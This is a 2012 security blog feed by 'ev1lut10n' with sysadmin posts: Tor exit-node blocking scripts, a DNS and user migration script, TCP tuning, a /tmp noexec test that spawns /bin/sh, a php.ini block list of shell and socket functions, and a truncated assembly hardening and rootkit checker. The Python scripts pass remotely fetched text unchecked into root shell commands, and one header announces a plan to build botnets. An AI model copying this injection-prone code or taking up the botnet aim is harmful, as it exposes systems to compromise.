tag:blogger.com,1999:blog-25981048198668709952012-03-09T17:19:05.989-08:00mywisdom blogDeveloping this weapon day by day , never resign never surrender. if only i've good team i can finish this faster, meanwhile i've so many jobs as a sysadmin , so fvckin shitzagen bola sbobetnoreply@blogger.comBlogger7271100tag:blogger.com,1999:blog-2598104819866870995.post-50526565116619093072012-03-09T17:19:00.002-08:002012-03-09T17:19:05.998-08:00simple tor ip collector and blocker 3#!/usr/bin/python<br />#simple tor ip collector and blocker v. 3<br />#made by:ev1lut10n<br />import urllib,sys,os,sgmllib <br /><br />def get_daftar_tor():<br /> os.system("rm -f Tor_ip_list_ALL.csv;wget http://torstatus.blutmagie.de/ip_list_all.php/Tor_ip_list_ALL.csv")<br /> file = open("Tor_ip_list_ALL.csv")<br /> while 1:<br /> tor_ip = file.readline()<br /> tor_ip=tor_ip.rstrip()<br /> cmd="/sbin/iptables -A INPUT -s "+tor_ip+" -j DROP"<br /> print cmd+" ---> executed"<br /> os.system(cmd)<br /> if not tor_ip:<br /> break<br /><br />def fetch_from_site_also():<br /> whois="/cgi-bin/whois.pl?ip="<br /> site="http://torstatus.blutmagie.de"<br /> try: <br /> site_data = urllib.urlopen(site) <br /> parser = MyParser() <br /> parser.parse(site_data.read()) <br /> except(IOError),msg: <br /> print "Error in connecting site ", site <br /> print msg <br /> sys.exit(1) <br /> links = parser.get_hyperlinks() <br /> for l in links:<br /> if whois in l:<br /> ip_of_t0r= l.replace("/cgi-bin/whois.pl?ip=","") <br /> ip_of_t0r=ip_of_t0r.rstrip()<br /> print ip_of_t0r<br /> cmd="/sbin/iptables -A INPUT -s "+ip_of_t0r+" -j DROP"<br /> print cmd+" ---> executed"<br /> os.system(cmd)<br /> <br /> <br />#asit dhal myparser class<br />class MyParser(sgmllib.SGMLParser): <br /> "A simple parser class." <br /><br /> def parse(self, s): <br /> "Parse the given string 's'." <br /> self.feed(s) <br /> self.close() <br /><br /> def __init__(self, verbose=0): <br /> "Initialise an object, passing 'verbose' to the superclass." <br /><br /> sgmllib.SGMLParser.__init__(self, verbose) <br /> self.hyperlinks = [] <br /><br /> def start_a(self, attributes): <br /> "Process a hyperlink and its 'attributes'." <br /><br /> for name, value in attributes: <br /> if name == "href": <br /> self.hyperlinks.append(value) <br /> if name == "src": <br /> self.hyperlinks.append(value) <br /><br /> def get_hyperlinks(self): <br /> "Return the list of hyperlinks." <br /><br /> return self.hyperlinks <br /><br />os.system("service iptables start")<br />get_daftar_tor()<br />fetch_from_site_also()<br />os.system("service iptables save")<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-5052656511661909307?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-37901920233358989462012-03-09T17:16:00.001-08:002012-03-09T17:16:04.956-08:00simple tor ip collector and blocker 2#!/usr/bin/python<br />#simple tor ip collector and blocker v. 2<br />#made by:ev1lut10n<br />import urllib,sys,os,sgmllib <br /><br />def get_daftar_tor():<br /> os.system("rm -f Tor_ip_list_ALL.csv;wget http://torstatus.blutmagie.de/ip_list_all.php/Tor_ip_list_ALL.csv")<br /> file = open("Tor_ip_list_ALL.csv")<br /> while 1:<br /> tor_ip = file.readline()<br /> tor_ip=tor_ip.rstrip()<br /> cmd="/sbin/iptables -A INPUT -s "+tor_ip+" -j DROP"<br /> print cmd+" ---> executed"<br /> os.system(cmd)<br /> if not tor_ip:<br /> break<br /><br />def fetch_from_site_also():<br /> whois="/cgi-bin/whois.pl?ip="<br /> site="http://torstatus.blutmagie.de"<br /> try: <br /> site_data = urllib.urlopen(site) <br /> parser = MyParser() <br /> parser.parse(site_data.read()) <br /> except(IOError),msg: <br /> print "Error in connecting site ", site <br /> print msg <br /> sys.exit(1) <br /> links = parser.get_hyperlinks() <br /> for l in links:<br /> if whois in l:<br /> ip_of_t0r= l.replace("/cgi-bin/whois.pl?ip=","") <br /> ip_of_t0r=ip_of_t0r.rstrip()<br /> print ip_of_t0r<br /> cmd="/sbin/iptables -A INPUT -s "+ip_of_t0r+" -j DROP"<br /> print cmd+" ---> executed"<br /> os.system(cmd)<br /> <br /> <br />#asit dhal myparser class<br />class MyParser(sgmllib.SGMLParser): <br /> "A simple parser class." <br /><br /> def parse(self, s): <br /> "Parse the given string 's'." <br /> self.feed(s) <br /> self.close() <br /><br /> def __init__(self, verbose=0): <br /> "Initialise an object, passing 'verbose' to the superclass." <br /><br /> sgmllib.SGMLParser.__init__(self, verbose) <br /> self.hyperlinks = [] <br /><br /> def start_a(self, attributes): <br /> "Process a hyperlink and its 'attributes'." <br /><br /> for name, value in attributes: <br /> if name == "href": <br /> self.hyperlinks.append(value) <br /> if name == "src": <br /> self.hyperlinks.append(value) <br /><br /> def get_hyperlinks(self): <br /> "Return the list of hyperlinks." <br /><br /> return self.hyperlinks <br /><br /><br />get_daftar_tor()<br />fetch_from_site_also()<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-3790192023335898946?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-42871421353235590672012-03-09T16:59:00.000-08:002012-03-09T16:59:09.795-08:00tor_server_collector.py#!/usr/bin/python<br />#simple tor ip collector and blocker<br />#made by:ev1lut10n<br />import os<br />def get_daftar_tor():<br /> os.system("rm -f Tor_ip_list_ALL.csv;wget http://torstatus.blutmagie.de/ip_list_all.php/Tor_ip_list_ALL.csv")<br /> file = open("Tor_ip_list_ALL.csv")<br /> while 1:<br /> tor_ip = file.readline()<br /> tor_ip=tor_ip.rstrip()<br /> cmd="/sbin/iptables -A INPUT -s "+tor_ip+" -j DROP"<br /> print cmd+" ---> executed"<br /> os.system(cmd)<br /> if not tor_ip:<br /> break<br /><br />os.system("service iptables start")<br />get_daftar_tor()<br />os.system("service iptables save")<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-4287142135323559067?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-46202578876757214562012-03-09T13:45:00.000-08:002012-03-09T13:45:17.822-08:00some skid attacking one of my server using tor exit nodeskids game he must pay much later<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-Vw_lCOzEhMk/T1p5wbVtQ7I/AAAAAAAAA8M/pMiHPumGJI4/s1600/botnet.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-Vw_lCOzEhMk/T1p5wbVtQ7I/AAAAAAAAA8M/pMiHPumGJI4/s1600/botnet.jpg" width="720" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-4620257887675721456?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-4800649731580976202012-03-08T18:49:00.003-08:002012-03-08T18:50:15.294-08:00zedi.pl the lord videl#!/usr/bin/perl -W<br />#zedi.pl the lord videl made by: ev1lut10n<br /><br />our $direktori_chroot="/home/nginx/";<br /><br />our $direktori_chroot_named="/var/named/chroot/var/named/";<br />our $old_ip="old_ip_here";<br />our $old_ip2="old_ip2_here";<br />our $new_ip="new_ip_here";<br /><br />our $old_ns1="old ns 0";<br />our $old_ns2="old ns 1";<br /><br /><br /><br />our $old_ns1b="old ns 2";<br />our $old_ns2b="old ns 3";<br /><br />our $new_ns1="new_private_ns_here";<br />our $new_ns2="new private ns here";<br /><br /><br />our $old_soa_ktk="old email on soa";<br />our $new_soa_ktk="h4x0r.l33tb0x.org";<br /><br /><br />our $dir_old_cpanel_environment="/home/mywisdom/users/";<br /><br />our $direktori_sites_nginx="/home/nginx/usr/local/nginx/sites-enabled/";<br /><br />sub readall_tgz_and_add_user<br />{<br /><br /><br />$direktori_file_tgz="/root/c/";<br />system("cd $direktori_file_tgz");<br />open(PROSES_MYSQL, "cd /root/c;ls *.tgz |");<br />while (<PROSES_MYSQL>)<br /> {<br />$file_tgz = $_;<br /> $nama_user=~ s/^\s+//; <br /> $nama_user=~ s/\s+$//;<br /> $file_tgz=~ s/^\s+//; <br /> $file_tgz=~ s/\s+$//;<br /><br />$nama_user=str_replace(".tgz","",$file_tgz);<br />$perintah_add_user="adduser -s /usr/sbin/nologin -d /home/".$nama_user." -M ".$nama_user;<br /><br /><br /> system($perintah_add_user);<br /><br /><br />$perintah_kopi_tgz="mkdir /home/".$nama_user.";cp ".$file_tgz." /home/".$nama_user.";cd /home/".$nama_user.";tar zxvf ".$file_tgz."";<br /><br /><br /> system($perintah_kopi_tgz);<br /><br /><br />$perintah_kopi_ke_chroot="cd ".$direktori_chroot."home/;mkdir ".$nama_user;<br />$perintah_kopi_ke_chroot.=";cp ".$direktori_file_tgz."/".$file_tgz." ".$direktori_chroot."home/".$nama_user;<br />$perintah_kopi_ke_chroot.=";cd ".$direktori_chroot."home/$nama_user;tar zxvf ".$file_tgz;<br /><br /><br /> system($perintah_kopi_ke_chroot);<br /> <br /> <br /> }<br />close(PROSES_MYSQL);<br />}<br /> <br /><br />sub replace_all_var_chroot_named<br />{<br />open(PROSES_MYSQL, "cd /var/named/chroot/var/named/;ls *.db |");<br />while (<PROSES_MYSQL>)<br /> {<br /> $file_named = $_;<br /> $file_named=~ s/^\s+//; <br /> $file_named=~ s/\s+$//;<br /> <br /> $perintah_rep_ip="perl -p -i -e 's/$old_ip/$new_ip/' /var/named/chroot/var/named/".$file_named;<br /><br /> <br /> system($perintah_rep_ip);<br /> print "\n";<br /><br /><br /> $perintah_rep_ip2="perl -p -i -e 's/$old_ip2/$new_ip/' /var/named/chroot/var/named/".$file_named;<br /><br /> <br /> system($perintah_rep_ip2);<br /> print "\n";<br /><br /><br /> $perintah_rep_ns1="perl -p -i -e 's/$old_ns1/$new_ns1/' /var/named/chroot/var/named/".$file_named;<br /><br /> <br /><br /> system($perintah_rep_ns1);<br /><br /> print "\n";<br /><br /> $perintah_rep_ns2="perl -p -i -e 's/$old_ns2/$new_ns2/' /var/named/chroot/var/named/".$file_named;<br /><br /><br /><br /><br /> <br /> system($perintah_rep_ns2);<br /> print "\n";<br /><br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> $perintah_rep_ns1b="perl -p -i -e 's/$old_ns1b/$new_ns1/' /var/named/chroot/var/named/".$file_named;<br /><br /> system($perintah_rep_ns1b);<br /> print "\n";<br /><br /><br /> $perintah_rep_ns2b="perl -p -i -e 's/$old_ns2b/$new_ns2/' /var/named/chroot/var/named/".$file_named;<br /><br /> system($perintah_rep_ns2b);<br /><br /> <br /> print "\n";<br /><br /> <br /><br /><br /><br /> $perintah_soa_ktk="perl -p -i -e 's/$old_soa_ktk/$new_soa_ktk/' /var/named/chroot/var/named/".$file_named;<br /><br /><br /><br /><br /><br /><br /><br /><br /> <br /> system($perintah_soa_ktk);<br /> print "\n";<br /><br /><br /><br /> <br /><br /> } <br />close(PROSES_MYSQL);<br /><br />}<br /><br /><br /><br /><br />sub str_replace {<br />eval<br /> {<br />my $replace_this = shift;<br /> my $with_this = shift;<br /> my $string = shift;<br /> <br /> my $length = length($string);<br /> my $target = length($replace_this);<br /> <br /> for(my $i=0; $i<$length - $target + 1; $i++) {<br /> if(substr($string,$i,$target) eq $replace_this) {<br /> $string = substr($string,0,$i) . $with_this . substr($string,$i+$target);<br /> return $string; #Comment this if you what a global replace<br /> }<br /> }<br /> return $string;<br />}<br />}<br /><br /><br />replace_all_var_chroot_named();<br /> readall_tgz_and_add_user();<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-480064973158097620?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-69661507842500967172012-03-06T20:38:00.000-08:002012-03-06T20:38:08.498-08:00reducing the tcp time wait & recycling trickrecycle trick:<br /><br />============<br />[root@ns1 ~]# /sbin/sysctl -w net.ipv4.tcp_tw_recycle=1<br />net.ipv4.tcp_tw_recycle = 1<br />[root@ns1 ~]# /sbin/sysctl -w net.ipv4.tcp_tw_reuse=1<br />==============<br /><br /><br />reducing fin wait <br /><br />===================<br />[root@ns1 ~]# echo "5" > /proc/sys/net/ipv4/tcp_fin_timeout<br />=======================<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-6966150784250096717?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-68673609460226838382012-03-06T19:17:00.000-08:002012-03-06T19:17:56.916-08:00Securing a Server from the Basic : Non Executable /tmpby: ev1lut10n<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-ZNq3kVLnTqg/T1bIPcA_NVI/AAAAAAAAA8E/8ZZf6wZGuws/s1600/botnet.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-ZNq3kVLnTqg/T1bIPcA_NVI/AAAAAAAAA8E/8ZZf6wZGuws/s1600/botnet.jpg" width="720" /></a></div><br />====================<br />[root@ns1 tmp]# pwd<br />/tmp<br />[root@ns1 tmp]# cat system.c<br />#include <stdio.h><br />int main()<br />{<br />execve("/bin/sh",0,0);<br /><br />}<br />[root@ns1 tmp]# gcc -o system system.c<br />[root@ns1 tmp]# ./system<br />bash: ./system: Permission denied<br />[root@ns1 tmp]# cp system /root<br />[root@ns1 tmp]# cd /root<br />[root@ns1 ~]# ./system<br />[root@ns1 root]# exit<br />exit<br />=======================<br /><br />from the above figure we may see that the /tmp on server is non executable.<br /><br />check it out:<br /><br />=============<br /><br />[root@ns1 tmp]# strace ./system<br />execve("./system", ["./system"], [/* 22 vars */]) = -1 EACCES (Permission denied)<br />dup(2) = 3<br />fcntl(3, F_GETFL) = 0x8002 (flags O_RDWR|O_LARGEFILE)<br />fstat(3, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 5), ...}) = 0<br />mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x2b574f71b000<br />lseek(3, 0, SEEK_CUR) = -1 ESPIPE (Illegal seek)<br />write(3, "strace: exec: Permission denied\n", 32strace: exec: Permission denied<br />) = 32<br />close(3) = 0<br />munmap(0x2b574f71b000, 4096) = 0<br />exit_group(1) = ?<br />[root@ns1 tmp]# <br />==============<br /><br /><br />from the above strace output we may notice the first line we calle execve("./system")<br />where and the result we got -1 EACCES (Permission denied)</stdio.h><br /><stdio.h><br /></stdio.h><br /><br /><stdio.h><br /></stdio.h><br /><stdio.h><br /></stdio.h><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-6867360946022683838?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-69929491017813074512012-03-06T11:16:00.002-08:002012-03-06T11:40:05.936-08:00Basic php.ini Security Setting disable_functions:<br />==================<br />[root@ns1 lib]# cat php.ini | grep disable_function<br />disable_functions = show_source, system, passthru, exec, popen, proc_open, allow_url_fopen, popen, symlink,curl_exec, curl_multi_exec, parse_ini_file, sleep, base64_decode,fsockopen,getopt,ibase_gen_id,glob,unserialize,pcntl_fork,socket_create,socket_connect,_zip_name_locate,grapheme_extract,bcpow,pdf_open_file,ntuser_getuserlist,posix_getpwuid,php_uname<br /><br />==================<br /><br /><br />===================<br />[root@ns1 lib]# cat php.ini | grep safe_mode <br />safe_mode = On<br />; then turn on safe_mode_gid.<br />safe_mode_gid = Off<br />===================<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-6992949101781307451?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-3386289501739997222012-03-06T07:18:00.002-08:002012-03-06T07:21:26.260-08:00herosvh.asm TCP/IP Stack Hardening and Basic Rootkit Checker | dedicated for my friendsource code:<br /><a href="http://pastebin.com/5ycUughs">http://pastebin.com/5ycUughs</a><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-4I7t4lmxG58/T1YqiyYGNvI/AAAAAAAAA78/Ozme3_wYPdw/s1600/botnet.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-4I7t4lmxG58/T1YqiyYGNvI/AAAAAAAAA78/Ozme3_wYPdw/s1600/botnet.jpg" width="620" /></a></div><br /><br />herosvh.asm:<br />========================================<br />;herosvh.asm - herosvh TCP/IP Stack Hardening and Basic Rootkit Checker ;version 1.0<br />;The programmer : ev1lut10n <br />;gopher://sdf.org/0/users/wisdomc0/code_asm/herosvh.asm<br />;dedicated to Mr Hero svh Rootkit<br />;thanks to : Hero SVH Rootkit,X-hack,Danzel,Superman,Cakill, nofia fitri,Dedy, Chaer, Paulus gandung,Tian,Zendy,Hendra, Wenkhairu and all my bro and ;friends<br />;current big project : "Making a linux botnet and windows botnet that can work synergy (my own idea)"<br />;website : http://www.jasaplus.com<br />;gopher://sdf.org/1/users/wisdomc0<br />;nasm -f elf herosvh.asm<br />;ld -o herosvh herosvh.o<br /><br />section .bss<br /><br />pilih_on_heap resb 6<br /><br />file: resd 1 <br /><br />section .data<br /><br />t00lname db ".::Herosvh TCP/IP Stack Hardening and Basic Rootkit Checker::.",13,10<br /><br />pjg_t00lname equ $-t00lname<br /><br />c0d3r db "c0der : ev1lut10n",13,10<br /><br />pjg_c0d3r equ $-c0d3r<br /><br />g0tr00t db "we got root access",13,10<br /><br />pjg_g0tr00t equ $-g0tr00t<br /><br />n0tr00t db "we dont have root priv,sorry y0u can not use this t00l baby",13,10<br /><br />pjg_n0tr00t equ $-n0tr00t<br /><br />;define jynx rootkit checker<br /><br />jynx_ld_preload_poison_string db "ld_poison.so",0x00<br /><br />jynx_ld_preload_so_path db "/etc/ld.so.preload",0x00<br /><br />;define haxpath checker for kbeast lkm<br /><br />_H4X_PATH_ db "/usr/_h4x_",0x00<br /><br />;software menu<br /><br />m3nu1 db "sys1 - Enable source validation by reversed path (checkin the source addr at ip datagram)",13,10<br /><br />pjg_m3nu1 equ $-m3nu1<br /><br />m3nu2 db "sys2 - Enable TCP Syn Cookies (protection against syn attack)",13,10<br /><br />pjg_m3nu2 equ $-m3nu2<br /><br />m3nu3 db "sys3 - Ignore ICMP Echo Broadcast Requests - (no smurf amplification)!!!",13,10<br /><br />pjg_m3nu3 equ $-m3nu3<br /><br />b0nus db "Some bonuses functions :"<br /><br />pjg_b0nus equ $-b0nus<br /><br />m3nu5 db "rkc1 - Checking Possible Jynx LD_Preload Rootkit",13,10<br /><br />pjg_m3nu5 equ $-m3nu5<br /><br />m3nu6 db "rkc2 - Checking Possible Kernel Beast Ver #1.0 LKM Rootkit -> _H4X_PATH_ /usr/_h4x_",13,10<br /><br />pjg_m3nu6 equ $-m3nu6<br /><br />m3nu7 db "quit - quit this t00l",13,10<br /><br />pjg_m3nu7 equ $-m3nu7<br /><br />;eof software menu<br /><br />c0ns0l3 db "cmd:"<br /><br />pjg_c0ns0l3 equ $-c0ns0l3<br /><br />pilih db "%s", 0<br /><br />teks_continue db "/etc/ld.so.preload found beware ! Sorry i'm lazy it's your job to check for ld_poison.so at /etc/ld.so.preload",13,10<br /><br />pjg_teks_continue equ $-teks_continue<br /><br />teks_dont_continue db "No /etc/ld.so.preload found ! Seems like your system is clean from jynx rootkit",13,10<br /><br />pjg_teks_dont_continue equ $-teks_dont_continue<br /><br /><br /><br />teks_continuex db "/usr/_h4x_ found ! Please wait !!! You're being infected with Kernel Beast Ver #1.0, why u install kernel headers ???",13,10<br /><br />pjg_teks_continuex equ $-teks_continuex<br /><br />teks_dont_continuex db "No /usr/_h4x_ found ! Seems like your system is clean from Kernel Beast Ver #1.0",13,10<br /><br />pjg_teks_dont_continuex equ $-teks_dont_continuex<br /><br /><br /><br />section .text<br /><br />global _start<br /><br />_start:<br /><br />;jmp _herosvh_sysc<br /><br />jmp long _herosvh_start<br /><br /><br /><br />;starting jynx rootkit checking routine<br /><br />_herosvh_jynx:<br /><br />push ebp <br /><br />mov ebp,esp<br /><br /> <br /><br /> xor eax,eax <br /><br /> xor ebx,ebx <br /><br /> xor ecx,ecx <br /><br /> xor edx,edx<br /><br /> <br /><br />call the_cek<br /><br />mov ebx,jynx_ld_preload_so_path<br /><br />int 0x80<br /><br /><br /><br />mov dword [file],eax<br /><br />cmp dword [file],0<br /><br />jle dont_continue<br /><br />je continue<br /><br /><br /><br />mov esp,ebp <br /><br />pop ebp<br /><br /><br /><br />continue:<br /><br />push ebp <br /><br />mov ebp,esp<br /><br /> <br /><br />mov ecx,teks_continue<br /><br />mov edx,pjg_teks_continue<br /><br />call _herosvh_writeln<br /><br />jmp long _herosvh_out<br /><br />mov esp,ebp <br /><br />pop ebp<br /><br /><br /><br />dont_continue:<br /><br />push ebp <br /><br />mov ebp,esp<br /><br /><br /><br />mov ecx,teks_dont_continue<br /><br />mov edx,pjg_teks_dont_continue<br /><br />call _herosvh_writeln<br /><br />jmp long _herosvh_out<br /><br />mov esp,ebp <br /><br />pop ebp<br /><br /><br /><br />the_cek:<br /><br />push ebp <br /><br />mov ebp,esp<br /><br />mov eax,5 <br /><br />xor ecx,0<br /><br />mov edx,0x100<br /><br />mov esp,ebp <br /><br />pop ebp<br /><br />ret<br /><br /><br /><br />;eof jynx rootkit checking<br /><br /><br /><br />;start ipsecs kbeast checking<br /><br />_herosvh_ipsecs:<br /><br />push ebp <br /><br />mov ebp,esp<br /><br /> xor eax,eax <br /><br /> xor ebx,ebx <br /><br /> xor ecx,ecx <br /><br /> xor edx,edx<br /><br />call the_cek2<br /><br />mov ebx,_H4X_PATH_<br /><br />int 0x80<br /><br />mov dword [file],eax<br /><br />cmp dword [file],0<br /><br />jle dont_continuex<br /><br />je continuex<br /><br /><br /><br />mov esp,ebp <br /><br />pop ebp<br /><br /><br /><br />continuex:<br /><br />push ebp <br /><br />mov ebp,esp<br /><br />mov ecx,teks_continuex<br /><br />mov edx,pjg_teks_continuex<br /><br />call _herosvh_writeln<br /><br />jmp long _herosvh_out<br /><br />mov esp,ebp <br /><br />pop ebp<br /><br /><br /><br />dont_continuex:<br /><br />push ebp <br /><br />mov ebp,esp<br /><br />mov ecx,teks_dont_continuex<br /><br />mov edx,pjg_teks_dont_continuex<br /><br />call _herosvh_writeln<br /><br />jmp long _herosvh_out<br /><br />mov esp,ebp <br /><br />pop ebp<br /><br /><br /><br />the_cek2:<br /><br />push ebp <br /><br />mov ebp,esp<br /><br />mov eax,5 <br /><br />xor ecx,0<br /><br />mov edx,0x100<br /><br />mov esp,ebp <br /><br />pop ebp<br /><br />ret<br /><br /><br /><br />;eof ipsecs kbeast checking<br /><br /><br /><br /><br /><br />;getpriv.s<br /><br />_herosvh_pr3p4r3_0pt:<br /><br /> push ebx <br /><br /> push esi <br /><br /> push edi <br /><br /> <br /><br />_herosvh_get_privilege:<br /><br /> push ebp<br /><br /> mov ebp, esp<br /><br /> mov eax, 18h<br /><br /> push eax<br /><br /> int 80h<br /><br /> <br /><br /> cmp al,0<br /><br /> jz _herosvh_g0tr00t<br /><br /> jmp _herosvh_n0tr00t<br /><br /> mov esp, ebp<br /><br /> pop ebp<br /><br /> <br /><br />;eof getpriv.s<br /><br />_herosvh_g0tr00t:<br /><br /> push ebp<br /><br /> mov ebp, esp<br /><br /> mov ecx,g0tr00t<br /><br /> mov edx,pjg_g0tr00t<br /><br /> call _herosvh_writeln<br /><br /> mov esp, ebp<br /><br /> pop ebp<br /><br /> jmp _herosvh_jmpmania<br /><br /> <br /><br />_herosvh_n0tr00t:<br /><br /> push ebp <br /><br /> mov ebp,esp<br /><br /> mov ecx,n0tr00t<br /><br /> mov edx,pjg_n0tr00t<br /><br /> call _herosvh_writeln<br /><br /> mov esp,ebp <br /><br /> pop ebp<br /><br /> jmp _herosvh_out<br /><br /><br /><br />_herosvh_writeln:<br /><br /> push ebp <br /><br /> mov ebp,esp<br /><br /> mov ebx,0x1<br /><br /> mov eax,0x4<br /><br /> int 80h<br /><br /> ;mov ah,09h<br /><br /> ;mov dx,offset str1ng<br /><br /> ;int 21h<br /><br /> mov esp,ebp <br /><br /> pop ebp<br /><br /> ret<br /><br /><br /><br /><br /><br />_herosvh_banner:<br /><br />push ebp<br /><br />mov ebp,esp<br /><br />mov ecx,t00lname<br /><br />mov edx,pjg_t00lname<br /><br />call _herosvh_writeln<br /><br /><br /><br />mov ecx,c0d3r<br /><br />mov edx,pjg_c0d3r<br /><br />call _herosvh_writeln<br /><br />mov esp,ebp<br /><br />pop ebp<br /><br />ret<br /><br /><br /><br /><br /><br />_herosvh_do:<br /><br /> mov eax, 11<br /><br /> int 80h<br /><br /> ret<br /><br /><br /><br />_herosvh_net.ipv4.icmp_echo_ignore_broadcasts_1:<br /><br /> push ebp<br /><br /> mov ebp, esp<br /><br /> <br /><br /> xor eax,eax <br /><br /> xor ebx,ebx <br /><br /> xor ecx,ecx <br /><br /> xor edx,edx <br /><br /> <br /><br /> push 0xb<br /><br /> pop eax<br /><br /> push edx<br /><br /> <br /><br /> push 0x313d ;=1<br /><br /> push 0x73747361 ;stsa<br /><br /> push 0x6364616f ;cdao <br /><br /> push 0x72625f65 ;rb_e<br /><br /> push 0x726f6e67 ;rong<br /><br /> push 0x695f6f68 ;i_oh<br /><br /> push 0x63655f70 ;ce_p<br /><br /> push 0x6d63692e ;mci.<br /><br /> push 0x34767069 ;4vpi<br /><br /> push 0x2e74656e ; .ten<br /><br /> <br /><br /> mov esi,esp<br /><br /> push edx<br /><br /> <br /><br /> push 0x772d ;w-<br /><br /> mov ecx,esp<br /><br /><br /><br /> push edx<br /><br /> push 0x6c746373<br /><br /> push 0x79732f6e <br /><br /> push 0x6962732f<br /><br /> mov ebx,esp<br /><br /><br /><br /> push edx<br /><br /> push esi<br /><br /> push ecx<br /><br /> push ebx<br /><br /> mov ecx,esp<br /><br /> int 80h<br /><br /> <br /><br /> <br /><br /> <br /><br /> mov esp,ebp<br /><br /> pop ebp<br /><br /> jmp long _herosvh_out<br /><br /><br /><br />_herosvh_net.ipv4.tcp_syncookies_1:<br /><br /> push ebp<br /><br /> mov ebp, esp<br /><br /> <br /><br /> xor eax,eax <br /><br /> xor ebx,ebx <br /><br /> xor ecx,ecx <br /><br /> xor edx,edx <br /><br /> <br /><br /> push 0xb<br /><br /> pop eax<br /><br /> push edx<br /><br /> <br /><br /> push 0x2031 ;1<br /><br /> push 0x3d736569 ;=sei<br /><br /> push 0x6b6f6f63 ;kooc<br /><br /> push 0x6e79735f ;nys_<br /><br /> push 0x7063742e ;pct.<br /><br /> push 0x34767069 ;4vpi<br /><br /> push 0x2e74656e ; .ten<br /><br /> <br /><br /> mov esi,esp<br /><br /> push edx<br /><br /> <br /><br /> push 0x772d ;w-<br /><br /> mov ecx,esp<br /><br /><br /><br /> push edx<br /><br /> push 0x6c746373<br /><br /> push 0x79732f6e <br /><br /> push 0x6962732f<br /><br /> mov ebx,esp<br /><br /><br /><br /> push edx<br /><br /> push esi<br /><br /> push ecx<br /><br /> push ebx<br /><br /> mov ecx,esp<br /><br /> int 80h<br /><br /> <br /><br /> xor eax,eax <br /><br /> xor ebx,ebx <br /><br /> xor ecx,ecx <br /><br /> xor edx,edx<br /><br /> <br /><br /> mov esp,ebp<br /><br /> pop ebp<br /><br /> jmp long _herosvh_out<br /><br /><br /><br />_herosvh_sysctl_w_net.ipv4.conf.all.rp_filter_1:<br /><br /> push ebp<br /><br /> mov ebp, esp<br /><br /> <br /><br /> xor eax,eax <br /><br /> xor ebx,ebx <br /><br /> xor ecx,ecx <br /><br /> xor edx,edx <br /><br /> <br /><br /> push 0xb<br /><br /> pop eax<br /><br /> push edx<br /><br /> <br /><br /> push 0x2031 ;1<br /><br /> push 0x3d726574 ;=ret<br /><br /> push 0x6c69665f ;lif_<br /><br /> push 0x70722e6c ;pr.l<br /><br /> push 0x6c612e66 ;la.f<br /><br /> push 0x6e6f632e ;noc.<br /><br /> push 0x34767069 ;4vpi<br /><br /> push 0x2e74656e ; .ten<br /><br /> <br /><br /> <br /><br /> mov esi,esp<br /><br /> push edx<br /><br /> <br /><br /> push 0x772d ;w-<br /><br /> mov ecx,esp<br /><br /><br /><br /> push edx<br /><br /> push 0x6c746373<br /><br /> push 0x79732f6e <br /><br /> push 0x6962732f<br /><br /> mov ebx,esp<br /><br /><br /><br /> push edx<br /><br /> push esi<br /><br /> push ecx<br /><br /> push ebx<br /><br /> mov ecx,esp<br /><br /> int 80h<br /><br /> <br /><br /> xor eax,eax <br /><br /> xor ebx,ebx <br /><br /> xor ecx,ecx <br /><br /> xor edx,edx<br /><br /> mov esp,ebp<br /><br /> pop ebp<br /><br /> jmp long _herosvh_out<br /><br /> <br /><br /><br /><br />_herosvh_jmpmania:<br /><br /> push ebp<br /><br /> mov ebp, esp<br /><br /> jmp _herosvh_start2<br /><br /> mov esp,ebp<br /><br /> pop ebp<br /><br /><br /><br />_herosvh_start:<br /><br />push ebp<br /><br />mov ebp,esp<br /><br />call (_herosvh_banner)<br /><br />jmp _herosvh_pr3p4r3_0pt<br /><br />mov esp,ebp<br /><br />pop ebp<br /><br /><br /><br /><br /><br />_herosvh_start2:<br /><br /> push ebp<br /><br /> mov ebp, esp<br /><br /> <br /><br /> <br /><br /> mov ecx,m3nu1<br /><br /> mov 